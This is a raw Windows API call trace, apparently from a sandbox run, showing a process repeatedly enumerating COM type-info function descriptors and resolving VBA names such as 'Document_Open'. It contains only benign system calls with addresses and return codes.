ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdc, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdd, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xde, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.223] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.223] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xea, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xeb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xec, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xed, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xee, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xef, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.224] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.224] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.225] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.225] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.225] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.225] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.225] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.225] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.225] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.225] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.225] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.225] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6bc8 | out: ppvObject=0x33e4fb6bc8*=0x1d39d552a68) returned 0x0 [0060.225] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb6bd8 | out: pVarVal=0x33e4fb6bd8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b9, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.225] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.225] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb6bd0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb6ae0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.225] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.225] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6b80 | out: ppvObject=0x33e4fb6b80*=0x0) returned 0x80004002 [0060.225] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb6ba8, pDummy=0x33e4fb6b80 | out: ppTypeAttr=0x33e4fb6ba8, pDummy=0x33e4fb6b80*=0x0) returned 0x0 [0060.225] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.225] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a97b0, cb=0x62) returned 0x1d39d848220 [0060.225] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x6 [0060.225] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.225] IUnknown:Release (This=0x1d39d552bc8) returned 0x5 [0060.225] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.226] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552bc8, memid=5, refPtrFlags=0xe4fb6f60, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d300000000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d300000000) returned 0x0 [0060.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Open", cchWideChar=5, lpMultiByteStr=0x33e4fb6fb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Open", lpUsedDefaultChar=0x0) returned 5 [0060.226] _mbscpy_s (in: _Dst=0x33e4fb6e00, _DstSizeInBytes=0xe, _Src=0x1d3a3172f52 | out: _Dst=0x33e4fb6e00) returned 0x0 [0060.226] _mbscpy_s (in: _Dst=0x33e4fb6e09, _DstSizeInBytes=0x5, _Src=0x33e4fb6fb0 | out: _Dst=0x33e4fb6e09) returned 0x0 [0060.226] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document_Open") returned 0x5089c1 [0060.227] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39dbb2230 [0060.227] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb2230) [0060.227] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.227] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6ce8 | out: ppvObject=0x33e4fb6ce8*=0x1d39d552a68) returned 0x0 [0060.227] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb6cf8 | out: pVarVal=0x33e4fb6cf8*(varType=0x0, wReserved1=0xe4fb, wReserved2=0x33, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.227] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.227] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb6cf0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6d10 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6d10*="") returned 0x0 [0060.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb6c00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.227] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.227] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb6cf0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb6cf0, pDummy=0x0) returned 0x0 [0060.227] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.227] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x0, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.227] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.227] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.227] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.227] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.227] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x10, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x11, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x12, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x13, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x14, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x15, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x16, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.228] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.228] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x17, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x18, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x19, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x20, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x21, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x22, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x23, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x24, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x25, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x26, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x27, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x28, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x29, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 